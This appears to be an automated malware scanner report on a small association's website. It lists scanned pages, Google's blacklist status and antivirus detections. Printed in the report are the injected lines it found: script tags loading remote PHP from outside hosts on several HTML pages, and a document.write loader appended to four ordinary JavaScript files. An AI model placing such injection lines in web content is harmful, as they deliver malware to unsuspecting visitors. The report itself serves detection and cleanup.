New scan:

Malware Scanner report for awalwelfareassociation.com

Malicious/Suspicious/Total urls checked
4/8/15
12 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "awalwelfareassociation.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=awalwelfareassociation.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://awalwelfareassociation.com/
200 OK
Content-Length: 19585
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script>

http://awalwelfareassociation.com/_wp_scripts/jsFlashVer.js
200 OK
Content-Length: 7685
Content-Type: text/javascript
clean
http://awalwelfareassociation.com/_wp_scripts/jspngfix.js
200 OK
Content-Length: 874
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() {
if(!supported) return;
if(!event.srcElement) return;
var src=event.srcElement.src;
if(!src) return;
if(!new RegExp(blankSrc).test(src)) {
if(/\.png$/.test(src.toLowerCase())) {
src = src.replace(/\(/g, "(" );
src = src.replace(/\)/g, ")" );
event.srcElement.src = blankSrc;
event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" src "',sizingMethod='scale')";
}
else { event.srcElement.runtimeStyle.filter = "";}
}
}
document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:Iframe-AEL [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.BIN
Comodo
TrojWare.JS.Iframe.SE
Kaspersky
HEUR:Trojan.Script.Generic
NANO-Antivirus
Trojan.Url.IframeB.bboxsl
F-Secure
Trojan.Iframe.BIN
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.RZ
GData
Trojan.Iframe.BIN
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.Iframe.BIN

http://awalwelfareassociation.com/_wp_scripts/jsValidation.js
200 OK
Content-Length: 1677
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function ValidateEmail(sEmail)
{
var reEmail=/^(. )@(. )$/;
var reQuotedString="(\"[^\"]*\")";
var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/;
var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] ";
var reGetString="(" reValidCharString "|" reQuotedString ")";
var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$");
var reDomain=new RegExp("^" reValidCharString "(\\." reValidCharString ")*$");
... 892 bytes are skipped ...
reWholeCharString)==-1) return false;
}
}
return true;
}
function ltrim(str, chars) {
chars = chars || "\\s";
return str.replace(new RegExp("^[" chars "] ", "g"), "");
}

function rtrim(str, chars) {
chars = chars || "\\s";
return str.replace(new RegExp("[" chars "] $", "g"), "");
}
document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>')

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Script-inf
Ad-Aware
Trojan.JS.Injector.DJ
nProtect
Trojan.JS.Injector.DJ
TrendMicro-HouseCall
TROJ_GEN.F47V1216
Emsisoft
Trojan.JS.Injector.DJ (B)
Microsoft
Trojan:HTML/Redirector.DS
MicroWorld-eScan
Trojan.JS.Injector.DJ
F-Secure
Trojan.JS.Injector.DJ
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.JS.Injector.DJ
BitDefender
Trojan.JS.Injector.DJ

http://awalwelfareassociation.com/_wp_scripts/jsMenus.js
200 OK
Content-Length: 9087
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

wp_menus.prototype.m_type = 0;
wp_menus.prototype.m_delay = 500;
wp_menus.prototype.m_bordersize = 1;
wp_menus.prototype.m_fontsize = 12;
wp_menus.prototype.m_filterOpacity = 100;
wp_menus.prototype.m_mozOpacity = 1;
wp_menus.prototype.m_width = 0;
wp_menus.prototype.m_padding = '3px 10px 3px 10px';
wp_menus.prototype.m_fontfamily = 'sans-serif';
wp_menus.prototype.m_bordercolor = '#000000';
wp_menus.prototype.m_bkgndcolor = 'transparent';
wp_menus.pro
... 3240 bytes are skipped ...
IE() ? 'td' : 'a'); for(var n = 0; n < vAnchors.length; n) vAnchors[n].style.width = iWidth; }}
else { if(this.m_firstpopup == 1) top = top (p.offsetHeight - e.offsetHeight) / 2; else if(this.m_firstpopup == 2) top = (top p.offsetHeight) - e.offsetHeight; }}
e.style.top = top "px"; e.style.left = left "px"; e.style.visibility = "visible";
}
document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>')

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Script-inf
Ad-Aware
Trojan.JS.Injector.DJ
nProtect
Trojan.JS.Injector.DJ
TrendMicro-HouseCall
TROJ_GEN.F47V0204
Emsisoft
Trojan.JS.Injector.DJ (B)
MicroWorld-eScan
Trojan.JS.Injector.DJ
F-Secure
Trojan.JS.Injector.DJ
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.JS.Injector.DJ
BitDefender
Trojan.JS.Injector.DJ

http://awalwelfareassociation.com/_wp_scripts/jsRollover.js
200 OK
Content-Length: 2034
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

rolls = new Array(); numRolls=0;
function PPFindObj(n, d) {
var p,i,x;
if( !d ) d=document;
if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); }
if( !(x=d[n])&&d.all ) x=d.all[n];
for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n];
for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document);
return x;
}
fun
... 1250 bytes are skipped ...
gDown = new Image(); this.imgDown.src = down;
this.imgDownOver = new Image(); this.imgDownOver.src = downover;
this.down = initDown; this.over = false; this.radio = radio;
}
function PPImgInit( name,normal,over,down,downover,initDown,radio ) { if (document.images) rolls[numRolls ] = new PPImg(name,normal,over,down,downover,initDown,radio); }
document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>')

Antivirus reports:

Avast
HTML:Script-inf
Ad-Aware
Trojan.JS.Injector.DJ
nProtect
Trojan.JS.Injector.DJ
TrendMicro-HouseCall
TROJ_GEN.F47V1216
Emsisoft
Trojan.JS.Injector.DJ (B)
Microsoft
Trojan:HTML/Redirector.DS
MicroWorld-eScan
Trojan.JS.Injector.DJ
F-Secure
Trojan.JS.Injector.DJ
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.JS.Injector.DJ
BitDefender
Trojan.JS.Injector.DJ

http://awalwelfareassociation.com/index.html
200 OK
Content-Length: 19585
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script>

http://awalwelfareassociation.com/about.html
200 OK
Content-Length: 15230
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889767"></script>

http://awalwelfareassociation.com/news.html
200 OK
Content-Length: 15748
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889775"></script>

http://awalwelfareassociation.com/solutions.html
200 OK
Content-Length: 12902
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889780"></script>

http://awalwelfareassociation.com/contact.html
200 OK
Content-Length: 16248
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889770"></script>

http://awalwelfareassociation.com/diary.html
200 OK
Content-Length: 12472
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889772"></script>

http://awalwelfareassociation.com/awal-function-2013.pdf
200 OK
Content-Length: 172751
Content-Type: application/pdf
clean
http://awalwelfareassociation.com/test404page.js
404 Not Found
Content-Length: 407
Content-Type: text/html
clean
http://awalwelfareassociation.com/on-sitetraining.html
200 OK
Content-Length: 9456
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889776"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: awalwelfareassociation.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:54:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19585
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 11:19:02 GMT

...19585 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: awalwelfareassociation.com
Referer: http://www.google.com/search?q=awalwelfareassociation.com

Result:
The result is similar to the first query. There are no suspicious redirects found.